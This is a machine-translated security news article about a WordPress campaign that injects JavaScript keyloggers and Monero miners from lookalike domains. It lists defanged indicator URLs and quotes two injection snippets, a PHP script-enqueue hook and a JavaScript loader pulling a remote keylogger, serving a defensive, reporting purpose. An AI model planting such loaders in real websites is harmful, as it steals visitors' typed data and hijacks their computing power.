Thousands of WordPress websites are downloading JavaScript keyloggers from the "cloudflare [.] Solutions" domain and copies of Monero

For now, laid up to hundreds of websites powered by WordPress, which were infected with malicious script from loading and an external domain dangerous JavaScript, which in turn record data entered by the user in text fields on websites. The experts from Sucuri mention about several hundred infected sites. Unfortunately, this distribution vector of malicious code was already noticed in April 2017. Since then, with several changes in TLD domains (from which the infected page loaded JavaScript code) and various methods of obfuscation, it managed to infect several thousand instances of WordPress, which copied Montero crypto-currency and they served as a "browser" keylogger.

Domains from which malicious JavaScript libraries were downloaded:

hxxps: // CDJs [.] Online / lib.js
hxxps: // CDJs [.] Online / lib.js? ver = ...
hxxps: // CDNs [.] ws / lib / googleanalytics.js? ver = ...
hxxps: // msdns [.] Online / lib / mnngldr.js? ver = ...
hxxps: // msdns [.] online / lib / klldr.js // "keylogger loader"
hxxps: // msdns [.] online / lib / kl.js // "keylogger loader" 

Monero keyloggers or excavators from the domain eg cdjs[.]online can be injected into the database into the " wp_posts " table or the " functions.php " file. This happens due to the leaky WordPress instance - vulnerabilities in plugins, the core WP itself, incorrectly secured Apache server, Nginx, or SSH / FTP services.

function chmnr_klgr_enqueue_script () {
wp_enqueue_script ('chmnr_klgr-js', 'hxxps: // cdns [.] ws / lib / googleanalytics.js', false); 


The domain " Cloudflare[.]solutions " has been blocked by search engine providers (Google and Firefox, which uses the Google API to detect malicious websites) and removed a few days after the researchers published their discovery in December 2017. It did not take long for criminals to quickly register several new domains that downloaded malicious libraries and which, in turn, ran the keylogger or the Monero excavator code developed by CoinHive, which specializes in providing such Internet services:

var snf = document.createElement ("script");
snf.type = "text / javascript";
snf.setAttribute ("defer", "defer");
snf.src = "hxxps: // msdns [.] online / lib / kl.js";
document.head.appendChild (SNF); 

We recommend that bloggers are smaller and larger to look at their websites for malicious scripts. The best way to do this is to use the built-in developer tools or use the guide recommended by Sucuri or the Polish company Webanti, which provides ready-made tools for real-time protection / scanning of websites.

The infection occurs due to software gaps, so it is worth to update the core, modules, view the " functions.php " file and change all the access passwords for the admin panel as well as the services on the server.

Learn more about our offer

If you sell security solutions, are a distributor, authorized partner or developer and would like to share your portfolio with a group of potential customers, advertise an event, software, hardware or other services on AVLab - simply write to us. Or maybe you had to deal with ransomware? We can also help you decrypt your files.
Read more

We use Google Cloud Translation and Gengo API’s to translate articles with exception of our comparative tests.